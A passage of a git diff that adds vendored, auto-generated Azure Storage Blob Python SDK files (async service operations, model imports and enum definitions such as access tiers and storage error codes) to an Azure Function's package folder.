direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + response_headers['x-ms-is-hns-enabled']=self._deserialize('bool', response.headers.get('x-ms-is-hns-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def submit_batch( + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> IO: + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. + :paramtype multipart_content_type: str + :keyword comp: comp. Default value is "batch". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + comp = kwargs.pop('comp', "batch") # type: str + + _content = self._serialize.body(body, 'IO') + + request = build_submit_batch_request( + url=self._config.url, + multipart_content_type=multipart_content_type, + comp=comp, + version=self._config.version, + content=_content, + content_length=content_length, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.submit_batch.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + submit_batch.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace_async + async def filter_blobs( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + where: Optional[str] = None, + marker: Optional[str] = None, + maxresults: Optional[int] = None, + **kwargs: Any + ) -> "_models.FilterBlobSegment": + """The Filter Blobs operation enables callers to list blobs across all containers whose tags match + a given search expression. Filter blobs searches across all containers within a storage + account but can be scoped within the expression to a single container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param where: Filters the results to return only to return only blobs whose tags match the + specified expression. Default value is None. + :type where: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :keyword comp: comp. Default value is "blobs". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: FilterBlobSegment, or the result of cls(response) + :rtype: ~azure.storage.blob.models.FilterBlobSegment + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.FilterBlobSegment"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blobs") # type: str + + + request = build_filter_blobs_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + where=where, + marker=marker, + maxresults=maxresults, + template_url=self.filter_blobs.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('FilterBlobSegment', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + filter_blobs.metadata = {'url': "{url}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__init__.py new file mode 100644 index 0000000..7920d76 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__init__.py @@ -0,0 +1,221 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +try: + from ._models_py3 import AccessPolicy + from ._models_py3 import AppendPositionAccessConditions + from ._models_py3 import ArrowConfiguration + from ._models_py3 import ArrowField + from ._models_py3 import BlobFlatListSegment + from ._models_py3 import BlobHTTPHeaders + from ._models_py3 import BlobHierarchyListSegment + from ._models_py3 import BlobItemInternal + from ._models_py3 import BlobMetadata + from ._models_py3 import BlobName + from ._models_py3 import BlobPrefix + from ._models_py3 import BlobPropertiesInternal + from ._models_py3 import BlobTag + from ._models_py3 import BlobTags + from ._models_py3 import Block + from ._models_py3 import BlockList + from ._models_py3 import BlockLookupList + from ._models_py3 import ClearRange + from ._models_py3 import ContainerCpkScopeInfo + from ._models_py3 import ContainerItem + from ._models_py3 import ContainerProperties + from ._models_py3 import CorsRule + from ._models_py3 import CpkInfo + from ._models_py3 import CpkScopeInfo + from ._models_py3 import DelimitedTextConfiguration + from ._models_py3 import FilterBlobItem + from ._models_py3 import FilterBlobSegment + from ._models_py3 import GeoReplication + from ._models_py3 import JsonTextConfiguration + from ._models_py3 import KeyInfo + from ._models_py3 import LeaseAccessConditions + from ._models_py3 import ListBlobsFlatSegmentResponse + from ._models_py3 import ListBlobsHierarchySegmentResponse + from ._models_py3 import ListContainersSegmentResponse + from ._models_py3 import Logging + from ._models_py3 import Metrics + from ._models_py3 import ModifiedAccessConditions + from ._models_py3 import PageList + from ._models_py3 import PageRange + from ._models_py3 import QueryFormat + from ._models_py3 import QueryRequest + from ._models_py3 import QuerySerialization + from ._models_py3 import RetentionPolicy + from ._models_py3 import SequenceNumberAccessConditions + from ._models_py3 import SignedIdentifier + from ._models_py3 import SourceModifiedAccessConditions + from ._models_py3 import StaticWebsite + from ._models_py3 import StorageError + from ._models_py3 import StorageServiceProperties + from ._models_py3 import StorageServiceStats + from ._models_py3 import UserDelegationKey +except (SyntaxError, ImportError): + from ._models import AccessPolicy # type: ignore + from ._models import AppendPositionAccessConditions # type: ignore + from ._models import ArrowConfiguration # type: ignore + from ._models import ArrowField # type: ignore + from ._models import BlobFlatListSegment # type: ignore + from ._models import BlobHTTPHeaders # type: ignore + from ._models import BlobHierarchyListSegment # type: ignore + from ._models import BlobItemInternal # type: ignore + from ._models import BlobMetadata # type: ignore + from ._models import BlobName # type: ignore + from ._models import BlobPrefix # type: ignore + from ._models import BlobPropertiesInternal # type: ignore + from ._models import BlobTag # type: ignore + from ._models import BlobTags # type: ignore + from ._models import Block # type: ignore + from ._models import BlockList # type: ignore + from ._models import BlockLookupList # type: ignore + from ._models import ClearRange # type: ignore + from ._models import ContainerCpkScopeInfo # type: ignore + from ._models import ContainerItem # type: ignore + from ._models import ContainerProperties # type: ignore + from ._models import CorsRule # type: ignore + from ._models import CpkInfo # type: ignore + from ._models import CpkScopeInfo # type: ignore + from ._models import DelimitedTextConfiguration # type: ignore + from ._models import FilterBlobItem # type: ignore + from ._models import FilterBlobSegment # type: ignore + from ._models import GeoReplication # type: ignore + from ._models import JsonTextConfiguration # type: ignore + from ._models import KeyInfo # type: ignore + from ._models import LeaseAccessConditions # type: ignore + from ._models import ListBlobsFlatSegmentResponse # type: ignore + from ._models import ListBlobsHierarchySegmentResponse # type: ignore + from ._models import ListContainersSegmentResponse # type: ignore + from ._models import Logging # type: ignore + from ._models import Metrics # type: ignore + from ._models import ModifiedAccessConditions # type: ignore + from ._models import PageList # type: ignore + from ._models import PageRange # type: ignore + from ._models import QueryFormat # type: ignore + from ._models import QueryRequest # type: ignore + from ._models import QuerySerialization # type: ignore + from ._models import RetentionPolicy # type: ignore + from ._models import SequenceNumberAccessConditions # type: ignore + from ._models import SignedIdentifier # type: ignore + from ._models import SourceModifiedAccessConditions # type: ignore + from ._models import StaticWebsite # type: ignore + from ._models import StorageError # type: ignore + from ._models import StorageServiceProperties # type: ignore + from ._models import StorageServiceStats # type: ignore + from ._models import UserDelegationKey # type: ignore + +from ._azure_blob_storage_enums import ( + AccessTier, + AccessTierOptional, + AccessTierRequired, + AccountKind, + ArchiveStatus, + BlobCopySourceTags, + BlobExpiryOptions, + BlobImmutabilityPolicyMode, + BlobType, + BlockListType, + CopyStatusType, + DeleteSnapshotsOptionType, + EncryptionAlgorithmType, + GeoReplicationStatusType, + LeaseDurationType, + LeaseStateType, + LeaseStatusType, + ListBlobsIncludeItem, + ListContainersIncludeType, + PremiumPageBlobAccessTier, + PublicAccessType, + QueryFormatType, + RehydratePriority, + SequenceNumberActionType, + SkuName, + StorageErrorCode, +) + +__all__ = [ + 'AccessPolicy', + 'AppendPositionAccessConditions', + 'ArrowConfiguration', + 'ArrowField', + 'BlobFlatListSegment', + 'BlobHTTPHeaders', + 'BlobHierarchyListSegment', + 'BlobItemInternal', + 'BlobMetadata', + 'BlobName', + 'BlobPrefix', + 'BlobPropertiesInternal', + 'BlobTag', + 'BlobTags', + 'Block', + 'BlockList', + 'BlockLookupList', + 'ClearRange', + 'ContainerCpkScopeInfo', + 'ContainerItem', + 'ContainerProperties', + 'CorsRule', + 'CpkInfo', + 'CpkScopeInfo', + 'DelimitedTextConfiguration', + 'FilterBlobItem', + 'FilterBlobSegment', + 'GeoReplication', + 'JsonTextConfiguration', + 'KeyInfo', + 'LeaseAccessConditions', + 'ListBlobsFlatSegmentResponse', + 'ListBlobsHierarchySegmentResponse', + 'ListContainersSegmentResponse', + 'Logging', + 'Metrics', + 'ModifiedAccessConditions', + 'PageList', + 'PageRange', + 'QueryFormat', + 'QueryRequest', + 'QuerySerialization', + 'RetentionPolicy', + 'SequenceNumberAccessConditions', + 'SignedIdentifier', + 'SourceModifiedAccessConditions', + 'StaticWebsite', + 'StorageError', + 'StorageServiceProperties', + 'StorageServiceStats', + 'UserDelegationKey', + 'AccessTier', + 'AccessTierOptional', + 'AccessTierRequired', + 'AccountKind', + 'ArchiveStatus', + 'BlobCopySourceTags', + 'BlobExpiryOptions', + 'BlobImmutabilityPolicyMode', + 'BlobType', + 'BlockListType', + 'CopyStatusType', + 'DeleteSnapshotsOptionType', + 'EncryptionAlgorithmType', + 'GeoReplicationStatusType', + 'LeaseDurationType', + 'LeaseStateType', + 'LeaseStatusType', + 'ListBlobsIncludeItem', + 'ListContainersIncludeType', + 'PremiumPageBlobAccessTier', + 'PublicAccessType', + 'QueryFormatType', + 'RehydratePriority', + 'SequenceNumberActionType', + 'SkuName', + 'StorageErrorCode', +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d488373 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc new file mode 100644 index 0000000..1001ef4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_azure_blob_storage_enums.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc new file mode 100644 index 0000000..a3bfcfb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc new file mode 100644 index 0000000..72afe33 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/__pycache__/_models_py3.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_azure_blob_storage_enums.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_azure_blob_storage_enums.py new file mode 100644 index 0000000..fb1bcd8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_azure_blob_storage_enums.py @@ -0,0 +1,336 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +from enum import Enum +from six import with_metaclass +from azure.core import CaseInsensitiveEnumMeta + + +class AccessTier(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + HOT = "Hot" + COOL = "Cool" + ARCHIVE = "Archive" + +class AccessTierOptional(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + HOT = "Hot" + COOL = "Cool" + ARCHIVE = "Archive" + +class AccessTierRequired(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + HOT = "Hot" + COOL = "Cool" + ARCHIVE = "Archive" + +class AccountKind(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + STORAGE = "Storage" + BLOB_STORAGE = "BlobStorage" + STORAGE_V2 = "StorageV2" + FILE_STORAGE = "FileStorage" + BLOCK_BLOB_STORAGE = "BlockBlobStorage" + +class ArchiveStatus(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + REHYDRATE_PENDING_TO_HOT = "rehydrate-pending-to-hot" + REHYDRATE_PENDING_TO_COOL = "rehydrate-pending-to-cool" + +class BlobCopySourceTags(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + REPLACE = "REPLACE" + COPY = "COPY" + +class BlobExpiryOptions(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + NEVER_EXPIRE = "NeverExpire" + RELATIVE_TO_CREATION = "RelativeToCreation" + RELATIVE_TO_NOW = "RelativeToNow" + ABSOLUTE = "Absolute" + +class BlobImmutabilityPolicyMode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + MUTABLE = "Mutable" + UNLOCKED = "Unlocked" + LOCKED = "Locked" + +class BlobType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + BLOCK_BLOB = "BlockBlob" + PAGE_BLOB = "PageBlob" + APPEND_BLOB = "AppendBlob" + +class BlockListType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + COMMITTED = "committed" + UNCOMMITTED = "uncommitted" + ALL = "all" + +class CopyStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + PENDING = "pending" + SUCCESS = "success" + ABORTED = "aborted" + FAILED = "failed" + +class DeleteSnapshotsOptionType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + INCLUDE = "include" + ONLY = "only" + +class EncryptionAlgorithmType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + NONE = "None" + AES256 = "AES256" + +class GeoReplicationStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """The status of the secondary location + """ + + LIVE = "live" + BOOTSTRAP = "bootstrap" + UNAVAILABLE = "unavailable" + +class LeaseDurationType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + INFINITE = "infinite" + FIXED = "fixed" + +class LeaseStateType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + AVAILABLE = "available" + LEASED = "leased" + EXPIRED = "expired" + BREAKING = "breaking" + BROKEN = "broken" + +class LeaseStatusType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + LOCKED = "locked" + UNLOCKED = "unlocked" + +class ListBlobsIncludeItem(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + COPY = "copy" + DELETED = "deleted" + METADATA = "metadata" + SNAPSHOTS = "snapshots" + UNCOMMITTEDBLOBS = "uncommittedblobs" + VERSIONS = "versions" + TAGS = "tags" + IMMUTABILITYPOLICY = "immutabilitypolicy" + LEGALHOLD = "legalhold" + DELETEDWITHVERSIONS = "deletedwithversions" + +class ListContainersIncludeType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + METADATA = "metadata" + DELETED = "deleted" + SYSTEM = "system" + +class PremiumPageBlobAccessTier(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + P4 = "P4" + P6 = "P6" + P10 = "P10" + P15 = "P15" + P20 = "P20" + P30 = "P30" + P40 = "P40" + P50 = "P50" + P60 = "P60" + P70 = "P70" + P80 = "P80" + +class PublicAccessType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + CONTAINER = "container" + BLOB = "blob" + +class QueryFormatType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """The quick query format type. + """ + + DELIMITED = "delimited" + JSON = "json" + ARROW = "arrow" + PARQUET = "parquet" + +class RehydratePriority(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """If an object is in rehydrate pending state then this header is returned with priority of + rehydrate. Valid values are High and Standard. + """ + + HIGH = "High" + STANDARD = "Standard" + +class SequenceNumberActionType(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + MAX = "max" + UPDATE = "update" + INCREMENT = "increment" + +class SkuName(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + + STANDARD_LRS = "Standard_LRS" + STANDARD_GRS = "Standard_GRS" + STANDARD_RAGRS = "Standard_RAGRS" + STANDARD_ZRS = "Standard_ZRS" + PREMIUM_LRS = "Premium_LRS" + +class StorageErrorCode(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + """Error codes returned by the service + """ + + ACCOUNT_ALREADY_EXISTS = "AccountAlreadyExists" + ACCOUNT_BEING_CREATED = "AccountBeingCreated" + ACCOUNT_IS_DISABLED = "AccountIsDisabled" + AUTHENTICATION_FAILED = "AuthenticationFailed" + AUTHORIZATION_FAILURE = "AuthorizationFailure" + CONDITION_HEADERS_NOT_SUPPORTED = "ConditionHeadersNotSupported" + CONDITION_NOT_MET = "ConditionNotMet" + EMPTY_METADATA_KEY = "EmptyMetadataKey" + INSUFFICIENT_ACCOUNT_PERMISSIONS = "InsufficientAccountPermissions" + INTERNAL_ERROR = "InternalError" + INVALID_AUTHENTICATION_INFO = "InvalidAuthenticationInfo" + INVALID_HEADER_VALUE = "InvalidHeaderValue" + INVALID_HTTP_VERB = "InvalidHttpVerb" + INVALID_INPUT = "InvalidInput" + INVALID_MD5 = "InvalidMd5" + INVALID_METADATA = "InvalidMetadata" + INVALID_QUERY_PARAMETER_VALUE = "InvalidQueryParameterValue" + INVALID_RANGE = "InvalidRange" + INVALID_RESOURCE_NAME = "InvalidResourceName" + INVALID_URI = "InvalidUri" + INVALID_XML_DOCUMENT = "InvalidXmlDocument" + INVALID_XML_NODE_VALUE = "InvalidXmlNodeValue" + MD5_MISMATCH = "Md5Mismatch" + METADATA_TOO_LARGE = "MetadataTooLarge" + MISSING_CONTENT_LENGTH_HEADER = "MissingContentLengthHeader" + MISSING_REQUIRED_QUERY_PARAMETER = "MissingRequiredQueryParameter" + MISSING_REQUIRED_HEADER = "MissingRequiredHeader" + MISSING_REQUIRED_XML_NODE = "MissingRequiredXmlNode" + MULTIPLE_CONDITION_HEADERS_NOT_SUPPORTED = "MultipleConditionHeadersNotSupported" + OPERATION_TIMED_OUT = "OperationTimedOut" + OUT_OF_RANGE_INPUT = "OutOfRangeInput" + OUT_OF_RANGE_QUERY_PARAMETER_VALUE = "OutOfRangeQueryParameterValue" + REQUEST_BODY_TOO_LARGE = "RequestBodyTooLarge" + RESOURCE_TYPE_MISMATCH = "ResourceTypeMismatch" + REQUEST_URL_FAILED_TO_PARSE = "RequestUrlFailedToParse" + RESOURCE_ALREADY_EXISTS = "ResourceAlreadyExists" + RESOURCE_NOT_FOUND = "ResourceNotFound" + SERVER_BUSY = "ServerBusy" + UNSUPPORTED_HEADER = "UnsupportedHeader" + UNSUPPORTED_XML_NODE = "UnsupportedXmlNode" + UNSUPPORTED_QUERY_PARAMETER = "UnsupportedQueryParameter" + UNSUPPORTED_HTTP_VERB = "UnsupportedHttpVerb" + APPEND_POSITION_CONDITION_NOT_MET = "AppendPositionConditionNotMet" + BLOB_ALREADY_EXISTS = "BlobAlreadyExists" + BLOB_IMMUTABLE_DUE_TO_POLICY = "BlobImmutableDueToPolicy" + BLOB_NOT_FOUND = "BlobNotFound" + BLOB_OVERWRITTEN = "BlobOverwritten" + BLOB_TIER_INADEQUATE_FOR_CONTENT_LENGTH = "BlobTierInadequateForContentLength" + BLOB_USES_CUSTOMER_SPECIFIED_ENCRYPTION = "BlobUsesCustomerSpecifiedEncryption" + BLOCK_COUNT_EXCEEDS_LIMIT = "BlockCountExceedsLimit" + BLOCK_LIST_TOO_LONG = "BlockListTooLong" + CANNOT_CHANGE_TO_LOWER_TIER = "CannotChangeToLowerTier" + CANNOT_VERIFY_COPY_SOURCE = "CannotVerifyCopySource" + CONTAINER_ALREADY_EXISTS = "ContainerAlreadyExists" + CONTAINER_BEING_DELETED = "ContainerBeingDeleted" + CONTAINER_DISABLED = "ContainerDisabled" + CONTAINER_NOT_FOUND = "ContainerNotFound" + CONTENT_LENGTH_LARGER_THAN_TIER_LIMIT = "ContentLengthLargerThanTierLimit" + COPY_ACROSS_ACCOUNTS_NOT_SUPPORTED = "CopyAcrossAccountsNotSupported" + COPY_ID_MISMATCH = "CopyIdMismatch" + FEATURE_VERSION_MISMATCH = "FeatureVersionMismatch" + INCREMENTAL_COPY_BLOB_MISMATCH = "IncrementalCopyBlobMismatch" + INCREMENTAL_COPY_OF_ERALIER_VERSION_SNAPSHOT_NOT_ALLOWED = "IncrementalCopyOfEralierVersionSnapshotNotAllowed" + INCREMENTAL_COPY_SOURCE_MUST_BE_SNAPSHOT = "IncrementalCopySourceMustBeSnapshot" + INFINITE_LEASE_DURATION_REQUIRED = "InfiniteLeaseDurationRequired" + INVALID_BLOB_OR_BLOCK = "InvalidBlobOrBlock" + INVALID_BLOB_TIER = "InvalidBlobTier" + INVALID_BLOB_TYPE = "InvalidBlobType" + INVALID_BLOCK_ID = "InvalidBlockId" + INVALID_BLOCK_LIST = "InvalidBlockList" + INVALID_OPERATION = "InvalidOperation" + INVALID_PAGE_RANGE = "InvalidPageRange" + INVALID_SOURCE_BLOB_TYPE = "InvalidSourceBlobType" + INVALID_SOURCE_BLOB_URL = "InvalidSourceBlobUrl" + INVALID_VERSION_FOR_PAGE_BLOB_OPERATION = "InvalidVersionForPageBlobOperation" + LEASE_ALREADY_PRESENT = "LeaseAlreadyPresent" + LEASE_ALREADY_BROKEN = "LeaseAlreadyBroken" + LEASE_ID_MISMATCH_WITH_BLOB_OPERATION = "LeaseIdMismatchWithBlobOperation" + LEASE_ID_MISMATCH_WITH_CONTAINER_OPERATION = "LeaseIdMismatchWithContainerOperation" + LEASE_ID_MISMATCH_WITH_LEASE_OPERATION = "LeaseIdMismatchWithLeaseOperation" + LEASE_ID_MISSING = "LeaseIdMissing" + LEASE_IS_BREAKING_AND_CANNOT_BE_ACQUIRED = "LeaseIsBreakingAndCannotBeAcquired" + LEASE_IS_BREAKING_AND_CANNOT_BE_CHANGED = "LeaseIsBreakingAndCannotBeChanged" + LEASE_IS_BROKEN_AND_CANNOT_BE_RENEWED = "LeaseIsBrokenAndCannotBeRenewed" + LEASE_LOST = "LeaseLost" + LEASE_NOT_PRESENT_WITH_BLOB_OPERATION = "LeaseNotPresentWithBlobOperation" + LEASE_NOT_PRESENT_WITH_CONTAINER_OPERATION = "LeaseNotPresentWithContainerOperation" + LEASE_NOT_PRESENT_WITH_LEASE_OPERATION = "LeaseNotPresentWithLeaseOperation" + MAX_BLOB_SIZE_CONDITION_NOT_MET = "MaxBlobSizeConditionNotMet" + NO_AUTHENTICATION_INFORMATION = "NoAuthenticationInformation" + NO_PENDING_COPY_OPERATION = "NoPendingCopyOperation" + OPERATION_NOT_ALLOWED_ON_INCREMENTAL_COPY_BLOB = "OperationNotAllowedOnIncrementalCopyBlob" + PENDING_COPY_OPERATION = "PendingCopyOperation" + PREVIOUS_SNAPSHOT_CANNOT_BE_NEWER = "PreviousSnapshotCannotBeNewer" + PREVIOUS_SNAPSHOT_NOT_FOUND = "PreviousSnapshotNotFound" + PREVIOUS_SNAPSHOT_OPERATION_NOT_SUPPORTED = "PreviousSnapshotOperationNotSupported" + SEQUENCE_NUMBER_CONDITION_NOT_MET = "SequenceNumberConditionNotMet" + SEQUENCE_NUMBER_INCREMENT_TOO_LARGE = "SequenceNumberIncrementTooLarge" + SNAPSHOT_COUNT_EXCEEDED = "SnapshotCountExceeded" + SNAPSHOT_OPERATION_RATE_EXCEEDED = "SnapshotOperationRateExceeded" + SNAPSHOTS_PRESENT = "SnapshotsPresent" + SOURCE_CONDITION_NOT_MET = "SourceConditionNotMet" + SYSTEM_IN_USE = "SystemInUse" + TARGET_CONDITION_NOT_MET = "TargetConditionNotMet" + 